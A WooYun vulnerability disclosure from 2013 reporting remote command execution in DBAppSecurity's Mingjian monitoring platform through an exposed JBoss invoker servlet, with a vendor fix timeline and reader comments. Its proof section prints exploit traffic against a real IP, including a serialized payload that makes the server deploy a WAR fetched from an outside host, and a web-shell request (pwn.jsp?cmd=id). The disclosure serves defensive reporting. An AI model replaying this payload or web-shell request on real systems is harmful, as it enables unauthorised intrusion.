当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-039520

漏洞标题:安恒明鉴 网站安全监测平台 通用远程命令执行漏洞

相关厂商:杭州安恒信息技术有限公司

漏洞作者: 猪猪侠

提交时间:2013-10-12 17:52

修复时间:2013-11-26 17:53

公开时间:2013-11-26 17:53

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-10-12: 细节已通知厂商并且等待厂商处理中
2013-10-16: 厂商已经确认,细节仅向厂商公开
2013-10-26: 细节向核心白帽子及相关领域专家公开
2013-11-05: 细节向普通白帽子公开
2013-11-15: 细节向实习白帽子公开
2013-11-26: 细节向公众公开

简要描述:

由于杭州安恒信息技术有限公司的基础技术架构使用了第三方开源中间件,导致远程命令执行漏洞存在。
过去几年中,安全领域在如何处理漏洞的评估方面取得了长足的进步,几乎每一个业务系统都越来越多地使用了第三方应用,从而导致系统被入侵的威胁也随之增加。由于第三方应用平行部署在业务系统之上,如果一个易受攻击的第三方应用被利用,这种攻击将导致严重的数据失窃或系统沦陷。
明鉴®网站安全监测平台
http://www.dbappsecurity.com.cn/products/products15.html

详细说明:

#1 漏洞说明
Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE 远程部署漏洞
http://www.exploit-db.com/exploits/28713/
#2 已测出受影响系统
明鉴®网站安全监测平台
http://www.dbappsecurity.com.cn/products/products15.html
#3 测试地址
http://202.100.78.68:8080/login

mingjian.jpg


漏洞证明:

#4 利用细节
php .\jboss.php 202.100.78.68 id
PHP Warning: Module 'mbstring' already loaded in Unknown on line 0
0 : 50 4f 53 54 20 2f 69 6e 76 6f 6b 65 72 2f 45 4a [POST /invoker/EJ]
10 : 42 49 6e 76 6f 6b 65 72 53 65 72 76 6c 65 74 2f [BInvokerServlet/]
20 : 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 74 65 [ HTTP/1.1..Conte]
30 : 6e 74 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 [ntType: applicat]
40 : 69 6f 6e 2f 78 2d 6a 61 76 61 2d 73 65 72 69 61 [ion/x-java-seria]
50 : 6c 69 7a 65 64 2d 6f 62 6a 65 63 74 3b 20 63 6c [lized-object; cl]
60 : 61 73 73 3d 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e [ass=org.jboss.in]
70 : 76 6f 63 61 74 69 6f 6e 2e 4d 61 72 73 68 61 6c [vocation.Marshal]
80 : 6c 65 64 49 6e 76 6f 63 61 74 69 6f 6e 0d 0a 41 [ledInvocation..A]
90 : 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 [ccept-Encoding: ]
A0 : 78 2d 67 7a 69 70 2c 78 2d 64 65 66 6c 61 74 65 [x-gzip,x-deflate]
B0 : 2c 67 7a 69 70 2c 64 65 66 6c 61 74 65 0d 0a 55 [,gzip,deflate..U]
C0 : 73 65 72 2d 41 67 65 6e 74 3a 20 4a 61 76 61 2f [ser-Agent: Java/]
D0 : 31 2e 36 2e 30 5f 32 31 0d 0a 48 6f 73 74 3a 20 [1.6.0_21..Host: ]
E0 : 32 30 32 2e 31 30 30 2e 37 38 2e 36 38 3a 38 30 [202.100.78.68:80]
F0 : 38 30 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 [80..Accept: text]
100 : 2f 68 74 6d 6c 2c 20 69 6d 61 67 65 2f 67 69 66 [/html, image/gif]
110 : 2c 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20 2a 3b [, image/jpeg, *;]
120 : 20 71 3d 2e 32 2c 20 2a 2f 2a 3b 20 71 3d 2e 32 [ q=.2, */*; q=.2]
130 : 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 [..Connection: ke]
140 : 65 70 2d 61 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e [ep-alive..Conten]
150 : 74 2d 74 79 70 65 3a 20 61 70 70 6c 69 63 61 74 [t-type: applicat]
160 : 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 [ion/x-www-form-u]
170 : 72 6c 65 6e 63 6f 64 65 64 0d 0a 43 6f 6e 74 65 [rlencoded..Conte]
180 : 6e 74 2d 4c 65 6e 67 74 68 3a 20 37 33 32 0d 0a [nt-Length: 732..]
190 : 0d 0a ac ed 00 05 73 72 00 29 6f 72 67 2e 6a 62 [......sr.)org.jb]
1A0 : 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e 4d [oss.invocation.M]
1B0 : 61 72 73 68 61 6c 6c 65 64 49 6e 76 6f 63 61 74 [arshalledInvocat]
1C0 : 69 6f 6e f6 06 95 27 41 3e a4 be 0c 00 00 78 70 [ion...'A>.....xp]
1D0 : 70 77 08 78 94 98 47 c1 d0 53 87 73 72 00 11 6a [pw.x..G..S.sr..j]
1E0 : 61 76 61 2e 6c 61 6e 67 2e 49 6e 74 65 67 65 72 [ava.lang.Integer]
1F0 : 12 e2 a0 a4 f7 81 87 38 02 00 01 49 00 05 76 61 [.......8...I..va]
200 : 6c 75 65 78 72 00 10 6a 61 76 61 2e 6c 61 6e 67 [luexr..java.lang]
210 : 2e 4e 75 6d 62 65 72 86 ac 95 1d 0b 94 e0 8b 02 [.Number.........]
220 : 00 00 78 70 26 95 be 0a 73 72 00 24 6f 72 67 2e [..xp&...sr.$org.]
230 : 6a 62 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e [jboss.invocation]
240 : 2e 4d 61 72 73 68 61 6c 6c 65 64 56 61 6c 75 65 [.MarshalledValue]
250 : ea cc e0 d1 f4 4a d0 99 0c 00 00 78 70 77 f0 00 [.....J.....xpw..]
260 : 00 00 e8 ac ed 00 05 75 72 00 13 5b 4c 6a 61 76 [.......ur..[Ljav]
270 : 61 2e 6c 61 6e 67 2e 4f 62 6a 65 63 74 3b 90 ce [a.lang.Object;..]
280 : 58 9f 10 73 29 6c 02 00 00 78 70 00 00 00 04 73 [X..s)l...xp....s]
290 : 72 00 1b 6a 61 76 61 78 2e 6d 61 6e 61 67 65 6d [r..javax.managem]
2A0 : 65 6e 74 2e 4f 62 6a 65 63 74 4e 61 6d 65 0f 03 [ent.ObjectName..]
2B0 : a7 1b eb 6d 15 cf 03 00 00 78 70 74 00 21 6a 62 [...m.....xpt.!jb]
2C0 : 6f 73 73 2e 73 79 73 74 65 6d 3a 73 65 72 76 69 [oss.system:servi]
2D0 : 63 65 3d 4d 61 69 6e 44 65 70 6c 6f 79 65 72 78 [ce=MainDeployerx]
2E0 : 74 00 06 64 65 70 6c 6f 79 75 71 00 7e 00 00 00 [t..deployuq.~...]
2F0 : 00 00 01 74 00 1a 68 74 74 70 3a 2f 2f 35 39 2e [...t..http://59.]
300 : 33 39 2e 37 31 2e 32 30 37 2f 61 2e 77 61 72 3f [39.71.207/a.war?]
310 : 75 72 00 13 5b 4c 6a 61 76 61 2e 6c 61 6e 67 2e [ur..[Ljava.lang.]
320 : 53 74 72 69 6e 67 3b ad d2 56 e7 e9 1d 7b 47 02 [String;..V...{G.]
330 : 00 00 78 70 00 00 00 01 74 00 10 6a 61 76 61 2e [..xp....t..java.]
340 : 6c 61 6e 67 2e 53 74 72 69 6e 67 0d d3 be c9 78 [lang.String....x]
350 : 77 04 00 00 00 01 73 72 00 22 6f 72 67 2e 6a 62 [w.....sr."org.jb]
360 : 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f 6e 2e 49 [oss.invocation.I]
370 : 6e 76 6f 63 61 74 69 6f 6e 4b 65 79 b8 fb 72 84 [nvocationKey..r.]
380 : d7 93 85 f9 02 00 01 49 00 07 6f 72 64 69 6e 61 [.......I..ordina]
390 : 6c 78 70 00 00 00 05 73 71 00 7e 00 05 77 0d 00 [lxp....sq.~..w..]
3A0 : 00 00 05 ac ed 00 05 70 fb 57 a7 aa 78 77 04 00 [.......p.W..xw..]
3B0 : 00 00 03 73 71 00 7e 00 07 00 00 00 04 73 72 00 [...sq.~......sr.]
3C0 : 23 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e 76 6f 63 [#org.jboss.invoc]
3D0 : 61 74 69 6f 6e 2e 49 6e 76 6f 63 61 74 69 6f 6e [ation.Invocation]
3E0 : 54 79 70 65 59 a7 3a 1c a5 2b 7c bf 02 00 01 49 [TypeY.:..+|....I]
3F0 : 00 07 6f 72 64 69 6e 61 6c 78 70 00 00 00 01 73 [..ordinalxp....s]
400 : 71 00 7e 00 07 00 00 00 0a 70 74 00 0f 4a 4d 58 [q.~......pt..JMX]
410 : 5f 4f 42 4a 45 43 54 5f 4e 41 4d 45 73 72 00 1b [_OBJECT_NAMEsr..]
420 : 6a 61 76 61 78 2e 6d 61 6e 61 67 65 6d 65 6e 74 [javax.management]
430 : 2e 4f 62 6a 65 63 74 4e 61 6d 65 0f 03 a7 1b eb [.ObjectName.....]
440 : 6d 15 cf 03 00 00 78 70 74 00 21 6a 62 6f 73 73 [m.....xpt.!jboss]
450 : 2e 73 79 73 74 65 6d 3a 73 65 72 76 69 63 65 3d [.system:service=]
460 : 4d 61 69 6e 44 65 70 6c 6f 79 65 72 78 78 [MainDeployerxx]
0 : 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d [HTTP/1.1 200 OK.]
10 : 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2d [.Server: Apache-]
20 : 43 6f 79 6f 74 65 2f 31 2e 31 0d 0a 58 2d 50 6f [Coyote/1.1..X-Po]
30 : 77 65 72 65 64 2d 42 79 3a 20 53 65 72 76 6c 65 [wered-By: Servle]
40 : 74 20 32 2e 34 3b 20 4a 42 6f 73 73 2d 34 2e 32 [t 2.4; JBoss-4.2]
50 : 2e 32 2e 47 41 20 28 62 75 69 6c 64 3a 20 53 56 [.2.GA (build: SV]
60 : 4e 54 61 67 3d 4a 42 6f 73 73 5f 34 5f 32 5f 32 [NTag=JBoss_4_2_2]
70 : 5f 47 41 20 64 61 74 65 3d 32 30 30 37 31 30 32 [_GA date=2007102]
80 : 32 31 31 33 39 29 2f 54 6f 6d 63 61 74 2d 35 2e [21139)/Tomcat-5.]
90 : 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a [5..Content-Type:]
A0 : 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6a [ application/x-j]
B0 : 61 76 61 2d 73 65 72 69 61 6c 69 7a 65 64 2d 6f [ava-serialized-o]
C0 : 62 6a 65 63 74 3b 20 63 6c 61 73 73 3d 6f 72 67 [bject; class=org]
D0 : 2e 6a 62 6f 73 73 2e 69 6e 76 6f 63 61 74 69 6f [.jboss.invocatio]
E0 : 6e 2e 4d 61 72 73 68 61 6c 6c 65 64 56 61 6c 75 [n.MarshalledValu]
F0 : 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f [e..Transfer-Enco]
100 : 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 44 [ding: chunked..D]
110 : 61 74 65 3a 20 53 61 74 2c 20 31 32 20 4f 63 74 [ate: Sat, 12 Oct]
120 : 20 32 30 31 33 20 31 37 3a 34 30 3a 31 35 20 47 [ 2013 17:40:15 G]
130 : 4d 54 0d 0a 0d 0a 34 39 0d 0a ac ed 00 05 73 72 [MT....49......sr]
140 : 00 24 6f 72 67 2e 6a 62 6f 73 73 2e 69 6e 76 6f [.$org.jboss.invo]
150 : 63 61 74 69 6f 6e 2e 4d 61 72 73 68 61 6c 6c 65 [cation.Marshalle]
160 : 64 56 61 6c 75 65 ea cc e0 d1 f4 4a d0 99 0c 00 [dValue.....J....]
170 : 00 78 70 77 0d 00 00 00 05 ac ed 00 05 70 fb 57 [.xpw.........p.W]
180 : a7 aa 78 0d 0a 30 0d 0a 0d 0a [..x..0....]
0 : 47 45 54 20 2f 61 2f 70 77 6e 2e 6a 73 70 3f 63 [GET /a/pwn.jsp?c]
10 : 6d 64 3d 69 64 20 48 54 54 50 2f 31 2e 30 0d 0a [md=id HTTP/1.0..]
20 : 48 6f 73 74 3a 20 32 30 32 2e 31 30 30 2e 37 38 [Host: 202.100.78]
30 : 2e 36 38 3a 38 30 38 30 0d 0a 43 6f 6e 6e 65 63 [.68:8080..Connec]
40 : 74 69 6f 6e 3a 20 43 6c 6f 73 65 0d 0a 0d 0a [tion: Close....]
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Set-Cookie: JSESSIONID=FC133F4D01C8CB57C5249693E24F5692; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 87
Date: Sat, 12 Oct 2013 17:40:20 GMT
Connection: close
uid=500(jboss) gid=500(jboss) groups=500(jboss) context=system_u:system_r:initrc_t

dbappsecurity.jpg

修复方案:

#1 删除不需要用到的多余接口
#2 设置中间件的访问控制权限,禁止web访问 /invoker 目录

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-10-16 15:52

厂商回复:

感谢猪猪侠对安恒信息的关注,我们正积极改进与升级。
国内信息安全任重道远,还需要与各位白帽精英携手共进。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-10-12 17:54 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    居然没有顶。。

  2. 2013-10-12 17:54 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    棒棒糖又开始生效了。

  3. 2013-10-12 17:57 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    看看是什么开源中间件 这种一般是个密盒 怎样发现的呢?

  4. 2013-10-12 17:58 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @寂寞的瘦子 事不过三,不再发了,机会留给其它朋友们~

  5. 2013-10-12 17:58 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    @Jannock 一个也出来了

  6. 2013-10-12 17:59 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @Jannock ⊙﹏⊙b,你用错马甲了!

  7. 2013-10-12 19:00 | 乌帽子 ( 路人 | Rank:29 漏洞数:3 | 学习黑客哪家强 | 中国山东找蓝翔 | sql...)

    哇,命令执行

  8. 2013-10-12 19:17 | hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)

    呵呵 打脸了

  9. 2013-10-12 20:08 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    明鉴的我这有三个有洞的地址,不知洞主是否全部提了。提了我就不提了,老早的ST2,没打算提

  10. 2013-10-12 20:14 | Windy ( 路人 | Rank:26 漏洞数:10 | 苦逼的民工)

    @一只猿 告诉你这不是ST2。。。。

  11. 2013-10-12 20:16 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    @Windy 额,好吧,我错了,我只是谷歌了下login.jspx

  12. 2013-10-12 20:48 | Windy ( 路人 | Rank:26 漏洞数:10 | 苦逼的民工)

    @一只猿 额。。

  13. 2013-10-12 23:03 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    威武霸气啊....

  14. 2015-08-23 08:42 | 刘洪泽 ( 普通白帽子 | Rank:130 漏洞数:35 | 一个到处找密码的小号..........)

    @猪猪侠 总觉得你和Jannock像是郭敬明和韩寒..........